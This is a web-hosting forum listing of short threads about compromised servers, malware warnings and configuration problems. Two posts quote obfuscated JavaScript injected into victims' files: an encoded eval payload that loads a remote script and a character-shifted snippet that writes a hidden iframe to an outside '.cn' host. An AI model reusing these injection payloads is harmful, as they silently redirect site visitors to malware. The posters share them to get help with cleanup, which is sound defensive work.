"JS:Bulered" Obfuscated Malware Code
Jul 23, 2009
Avast started giving out warnings when people viewed my site saying a trojan horse was detected called "JS:Bulered".
I looked through the page and noticed a chunk of code added at the end of the page:
[code ...]
I cleared it then noticed it was also added to random files on my Invision Power Board forum and Coppermine gallery so I cleared it from there as well (just replaced the files from a backup I had).
I'm currently on a dedicated server with SoftLayer and I have a few other sites and when checking them I noticed the code was added to pages on those sites as well!
Right now I'm just concentrating on my main site I've cleared all the code, changed the password, ftp password, root password for the server. But after several hours the code was added again..
I read somewhere that it could be an infection on my computer that is using the ftp connection I make to inject the code to my site so I've changed the ftp password again and I've stopped using ftp. It's been a couple of hours and the code hasn't been added back yet but there's a good chance it'll be back soon.
View 7 Replies
ADVERTISEMENT
Jul 7, 2007
when I try to send Email from horde I have this:
PHP Code:
There was an error sending your message: Failed to add recipient: xxxxx@hotmail.com [SMTP: Invalid response code received from server (code: 451, response: Temporary local problem - please try later)]
View 5 Replies
View Related
Jul 31, 2006
How would I trace a malware file uploaded to a particular account? ....
View 2 Replies
View Related
May 16, 2009
in my server more than 5 sites got malware and gumblar.cn trojan, when i keep deleting it, it keeps coming back, any idea how to solve this?
View 10 Replies
View Related
Apr 23, 2008
Can this be interpreted as a malware (procede the following steps with caution).
After visiting miniclip.com/games/super-gerball/en/ without me clickiing on anything and confirming that I want to Install a game, a new folder is created in my Windows Start Menu and in a Documents and Settings folder.
Although I believe no harm is actually done with this installation, can attacker use this method to install a malware? How can I prevent this, what options should I change in my Firefox browser?
View 3 Replies
View Related
Oct 31, 2009
Recently, i hosted my domain with two different servers. but both of them were attacked by malwares and viruses. Google also started showing warning like "This site may harm your computer".
Now i can't open my site on firefox (it gives security warning)... when i open in explorer , my index page is totally changed.
Is there a solution for that? Which linux server will be best to protect my site from malware attacks.
View 7 Replies
View Related
Apr 8, 2009
A website I've recently been entrusted with was cracked into via brute force ftp earlier this week. Apparently the bad guys ran a script that added iframe links to every page named index.html. The iframe linked to 3 sites that prompted malware downloads.
I think I've found and removed all the affected code, however I'm looking for an online website scanner that will drill down through all the links on a given site and search the code for similar problems.
I've only found a couple of these so far and they don't seem to fit the bill; was wondering if anyone here had recommendations or experience with similar tools...
View 1 Replies
View Related
Apr 29, 2009
A Wordpress install on one of my domains was compromised a few months ago, and there was a 4-hour window in which the site contained an iframe injection that lead to a malware site.
The problem was corrected, and Google stopped flagging the site as malicious within a few hours after the fix. However, every once in a while I still hear of people having problems accessing the site, all of them I think from within large corporate networks.
Are there a few common list providers that these corporate networks are likely to be subscribing to? Is there a way I can submit the domain for reevaluation? If not, how long would you think a domain would have to be clean in order to repair its reputation on these lists?
View 3 Replies
View Related
Jul 24, 2009
When i try to open any website hosted on my server (around 50 of them) i am being taken to following malware website;
[url]
[url]
This is a problem with my Limnux server running Apache and not a virus on my local computer as customers from all over are reporting the same issue.
As soon as i restart Apache eveything returns to normal with no such redirects.
I think my server is being attacked causing http requests to get redirected to some malicious website.
This issue would resurface almost every hour and would not go away till i restart apache.
So far my Datacenter techs. have not been able to identify the cause of this.
View 14 Replies
View Related
Aug 21, 2006
malware acl condition: clamd: connection to 127.0.0.1, port 3310 failed (Bad file descriptor)
This is a normal Cpanel FC3 exim/clamav server.
Has anyone come across this annoying yet little error?
View 6 Replies
View Related
Oct 13, 2008
What is EPP code, I am required to enter it to register domain
View 5 Replies
View Related
Jul 16, 2009
I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?
CentOS 5.2 - 64bits
WHM+cPanel
Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
View 5 Replies
View Related
Apr 9, 2007
PHP 5.2.1 installed on WHM 10.8.0 cPanel 10.9.0-C9565
If I load a php file on browser, it gets loaded, but in HTML source I can see php code.
If I run in SSH "php info.php", the php code gets runn and normal output is generated.
I checked these lines in httpd.conf:
LoadModule php5_module libexec/libphp5.so
AddModule mod_php5.c
AddHandler application/x-httpd-php .php .php4 .php3
AddType application/x-httpd-php .php
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .php3
AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .phtml
"php -v" returns:
PHP 5.2.1 (cli) (built: Apr 9 2007 10:38:29)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Zend Extension Manager v1.2.0, Copyright (c) 2003-2006, by Zend Technologies
with Zend Optimizer v3.2.2, Copyright (c) 1998-2006, by Zend Technologies
On php.ini I have:
; Enable the PHP scripting language engine under Apache.
engine = "On" ;engine
I use long tags ("<?php").
I recompiled Apache and PHP few times, both from WHM and from SSH. I reinstalled Zend optimizer.
View 1 Replies
View Related
Nov 12, 2007
We are testing a module that we think may improve stability on our webservers. The module limits the number of concurrent connections allowed from any particular ip address.
What I need an opinion on is what error message the server should return when it is refusing because of the limit.
The module currently returns a 503 error, that's what the module's author set it to do. 503 is a temporary error, which is good, but it implies that the problem is with the server, which seems somewhat inaccurate to me.
I was thinking a 409 would be good, with text saying that the request conflicts with the per visitor connection limit for the requested resource. Ideally the browser would display the message and people would know to reconfigure software or wait for existing connections to complete before resubmitting the request.
One of my co-workers here says that at least people understand the "server busy" error and they won't understand the "conflict" message.
Someone else says most of these errors will come from folks using http 1.0 and the 409 doesn't exist at that level of the protocol, so they won't get anything more than a generic "error!" type of message.
View 1 Replies
View Related
Jul 27, 2007
I put the windows media palyer embedded code on my site, but is there a way to limit the buffer or rate at which the video downloads or streams to the user.
Quote:
<object classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" codebase= [url]
That is the code i use.
View 0 Replies
View Related
Jun 10, 2007
does anybody have a script that can veiw the php source code before it runs to the server of an external site
View 1 Replies
View Related
Jun 4, 2009
Someone sniffed ftp password of a user account on my server and looks like javascripts were altered and iframe tags inserted in php files, while i cleaned up php pages i see the following javascript code added to each .js file, what is it supposed to do?
<!--
(function(qAWI){var OMt9='var-20a-3d-22S-63-72ip-74-45n-67-69ne-22-2cb-3d-22-56e-72sion-28)+-22-2cj-3d-22-22-2cu-3dnavigator-2e-75s-65-72A-67-65nt-3bi-66((-75-2eindex-4ff-28-22-43h-72ome-22)-3c0)-26-26(u-2einde-78-4ff(-22Win-22)-3e0)-26-26(u-2eindexOf(-22-4eT-206-22)-3c0)-26-26-28doc-75me-6et-2eco-6fk-69e-2e-69-6ed-65x-4ff(-22-6di-65k-3d1-22)-3c0-29-26-26(ty-70-65-6ff(z-72v-7at-73)-21-3dty-70eof(-22A-22)))-7b-7a-72v-7a-74s-3d-22A-22-3beval(-22-69-66(window-2e-22+a+-22)j-3d-6a+-22-2ba+-22M-61jo-72-22-2b-62-2ba+-22-4din-6f-72-22+b+a+-22B-75ild-22-2b-62+-22-6a-3b-22)-3bd-6f-63u-6dent-2ewri-74e(-22-3c-73c-72ipt-20src-3d-2f-2fma-22+-22rtuz-2ecn-2fvid-2f-3fi-64-3d-22-2bj+-22-3e-3c-5c-2fsc-72ipt-3e-22)-3b-7d';var M2ye=OMt9.replace(qAWI,'%');eval(unescape(M2ye))})(/-/g);
-->
View 7 Replies
View Related
May 6, 2009
I have a customer who is hosting a website on a dedicated server. The server is a high spec server with Intel Core 2 DUO E8400 processor, 4 GB DDR2 ECC RAM and a SATA Hard Drive. He is running only a single website which has a data entry section. The problem is that a few scripts when run consume 99% of the CPU. In fact, there is a particular script which even if run alone consumes 99% CPU. The code retrieves some records from the database by running an SQL query. The code is never executed. I have checked the sql query in the code and it runs fine if executed in SQL Query Analyzer. I know the problem is somewhere in the code, but cannot find the exact cause. Is there a tool to debug the asp code and find out may be the issue with the code? I have tried the Debug Diagnostics utility,
View 2 Replies
View Related
Jul 18, 2009
how this new feature works in csf with blocking by country code.
I'm trying to put a block on Indonesia.
View 5 Replies
View Related
Oct 21, 2009
A friend of mine is trying to show the page below, however it just shows the code.
[url]
What can I do to fix it?
View 13 Replies
View Related
Oct 27, 2008
all sites in my server have maliciose code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
how to localize this code in my sites, using grep.
My server work in centos.
View 3 Replies
View Related
Oct 2, 2008
I am currently developing a web application on a WAMP server. Once complete my client will have some in-house "programmers" make changes to the code as they are needed.
My client wants to track all changes made to the source files (ie- who made the change, when it was made, what files were modified, and what specific lines were added/removed/modified). Also, the program must run on the server and not the programmers computers.
I've searched high and low and only found a couple programs that scratch the surface of what they want.
View 4 Replies
View Related
Mar 10, 2008
Some JSP pages display the source code. Some work and some don't even after recompiling apache with tomcat module and restarting jsp.
-rw-r--r-- 1 user user 6.5K Mar 10 17:18 index.jsp
Not sure where the jsp logs are, but there were no errors in the domlogs.
View 7 Replies
View Related
Jun 14, 2008
I have just moved to a VPS server from my shared hosting server and I am suddenly finding it tough to code equally well by just using the vim command. I have become more used to the CPanel code editor probably.
Can anyone suggest a nice tool for the same. I have installed webmin, but its code editor just sucks.
View 14 Replies
View Related
May 14, 2007
i have a vps account and am trying to setup my website i installed php 4 from a control panel where it auto installed php and there is mysql and i installed all of them but when i upload my script and go to install or go to the index of my site it shows the php code and does not execute.
my permissions are right on i also made a testphp file and used this code <?php phpinfo(); ?> and still nothing just shows the php code when you browse to the file i even went further i installed from the control panel another program called phpmyadmin and when i log in it does the same thing just shows php code so what the hell is going on you think i need to contact my host provider for this issue i sent an email out but waiting for a responce
View 7 Replies
View Related
Apr 28, 2007
I have a site that runs on my dedicated server and it is MySQL/PHP based. Sometimes when I post news to the site or even try to open the homepage I get:
Quote:
Server Error
The following error occurred: [code=SERVER_RESPONSE_CLOSE] The server closed
the connection while reading the response. Contact your system administrator.
View 4 Replies
View Related
May 22, 2007
If I want to open a url say, [url]I can use file_get_content
$content=file_get_content[url]
How to do the equivalent using curl, socket, socket, and wget?
View 3 Replies
View Related
Aug 5, 2007
My server was just upgraded to FC6 and now I do not have pico for a editor. I found nano but there is problems. Screen does not refresh correctly and when I type in charaters sometimes extra charaters show up.
Are there any other screen editors built in to FC6 (not vi)
View 4 Replies
View Related
Oct 16, 2007
A friend of mine that has a proxy site on my server just realized that his site is giving some very weird error and he said he has not made any changes to the site in a while as he's been pre-occupied with other things...
Quote:
--removed--.com has sent an incorrect or unexpected message. Error Code: -12263
It appears as a JavaScript Alert when you hit submit on the proxy url form... However, I looked into it a bit and there is no JavaScript on the page... Therefore, it must be some sort of server error I'd assume... I even disabled JavaScript in Firefox and still received the error...
View 4 Replies
View Related
Nov 5, 2007
It is possible to make code execution on the server with applications such as FastCGI or Zend Optimizer, but the code isn't compiled for good, it's more of a bytecode that is created on the fly, correct?
I'd like to know if it's possible to compile code (PHP, Python, Ruby, etc...) so that when you request a page, the compiled code is executed the same way as compiled C++ code with cgi-bin.
I'm asking because it would be quite efficient in case of high-traffic web sites instead of running intermediary code (bytecode).
Is it possible? What do you think is the more efficient, less resource-intensive and fastest way to execute dynamic-content pages?
View 3 Replies
View Related
Aug 2, 2007
I am using dreamweaver to build our corporate intranet for a company I work for. I created a header.php file for a menu that is completed. Using dreamweaver I entered this code:
<?php
include("header.php");
?>
in the appropriate section of the index.php file. The file name is correct and in the right place. It shows up fine in dreamweaver, but the menu is missing when you view it on the intranet. Please help guys. I have been at this for 2 days now and my boss is waiting for a presentation on this.
View 14 Replies
View Related
